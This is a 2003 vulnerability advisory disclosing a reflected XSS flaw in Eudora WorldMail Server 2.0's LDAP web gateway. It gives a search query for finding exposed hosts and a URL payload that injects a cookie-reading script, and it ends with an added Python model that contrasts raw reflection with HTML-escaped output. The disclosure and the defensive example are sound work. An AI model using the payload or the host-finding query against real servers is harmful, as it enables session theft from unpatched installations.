------------------------------------------------------------------
- EXPL-A-2003-020 exploitlabs.com Advisory 020
------------------------------------------------------------------
-= Eudora Worldmail Server 2.0 =-

Donnie Werner
Aug 9, 2003

Product:
--------
Eudora Worldmail Server 2.0
http://www.qualcomm.com/
http://www.eudora.com/worldmail/

Vulnerability(s):
----------------
1. XSS injection

Description of product:
-----------------------
http://www.eudora.com/worldmail/features.html

Banner id:

HTTP/1.0 200 Document follows
Server: ISOCOR web500gw 2.0.0.3
MIME-Version: 1.0
Date: Wednesday, 06-Aug-2003 GMT
Content-type: text/html

examples could be found by:
http://www.google.com/search?num=20&hl=en&lr=&ie=ISO-8859-1&newwindow=1&safe=off&q=Qpam.htm&btnG=Google+Search

VULNERABILITY / EXPLOIT
======================

Vulnerable hosts display the following:

-------------- snip ----------------------
A convenient hypertext interface to LDAP and X.500 Directories.

Local domains and aliases

Results for: entries at the top level

Name    Description
Countries
AE      <---------------- example country
IT
CA
--------------- snip --------------------

Select a country ( "AE" used as example )
you should see something like the following..

http://[host]:8888/c%3dAE

and a search box "One-level search in AE:"
enter some cool XSS... and get

http://[host]:8888/c%3dAE?%3FO=%3CSCRIPT%3Ealert%28document.cookie%29%3B%3C%2FSCRIPT%3E

the results are rendered by the output of the formatted html.

yes, it is just a non-persistent XSS, but this is running as a service
on port 8888 and is a mail processing server, so there may be other
issues ( DoS ? ) as well. I believe LDAP has some DCOM connectivity as
well, and there could be issues with the LDAP...

SLAPD or X.500 Error: Not found
An error occurred while searching the SLAPD or X.500 directory
The error code was 32: No such object.
No additional information is available.
Please report errors to the Administrator.

Local:
------
???

Remote:
-------
yes

Vendor Fix:
-----------
No fix on 0day

Vendor Contact:
---------------
Concurrent with this advisory
eudora-custserv@qualcomm.com

Credits:
--------
Donnie Werner
morning_wood@e2-labs.com
http://e2-labs.com

Original may be found at
http://exploitlabs.com/files/advisories/EXPL-A-2003-020-eudora-worlmail-server-pre.txt
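
Added example (not part of the original advisory and not WorldMail or web500gw code): a model of the reflection described above, showing the search filter from the advisory's URL echoed raw and then HTML-escaped on output. The page template and all function names are assumptions made for illustration.

```python
import html
from urllib.parse import unquote

# Constructed request target: path and query of the URL shown in the
# advisory, with the host part omitted.
SAMPLE_TARGET = ("/c%3dAE?%3FO=%3CSCRIPT%3Ealert%28document.cookie%29"
                 "%3B%3C%2FSCRIPT%3E")

# Hypothetical page template; the gateway's real HTML is not on the page.
PAGE = ("<html><body><h2>One-level search in {dn}:</h2>"
        "<p>Results for: {filt}</p></body></html>")


def parse_target(target):
    """Split a request target into percent-decoded (base DN, search filter)."""
    path, _, query = target.partition("?")
    return unquote(path.lstrip("/")), unquote(query)


def render_unsafe(target):
    """Reflects decoded input verbatim: the behaviour the advisory reports."""
    dn, filt = parse_target(target)
    return PAGE.format(dn=dn, filt=filt)


def render_safe(target):
    """Same page, but every reflected value is HTML-escaped on output."""
    dn, filt = parse_target(target)
    return PAGE.format(dn=html.escape(dn, quote=True),
                       filt=html.escape(filt, quote=True))


def reflects_markup(page, target):
    """True if the filter contains HTML metacharacters and appears
    unescaped in the response body, i.e. it was reflected raw."""
    _, filt = parse_target(target)
    return any(c in filt for c in "<>\"'&") and filt in page


if __name__ == "__main__":
    for name, fn in (("unsafe", render_unsafe), ("safe", render_safe)):
        body = fn(SAMPLE_TARGET)
        print(name, reflects_markup(body, SAMPLE_TARGET), body)
```

Both the base DN taken from the path and the filter taken from the query string are request-controlled, so the hardened renderer escapes both.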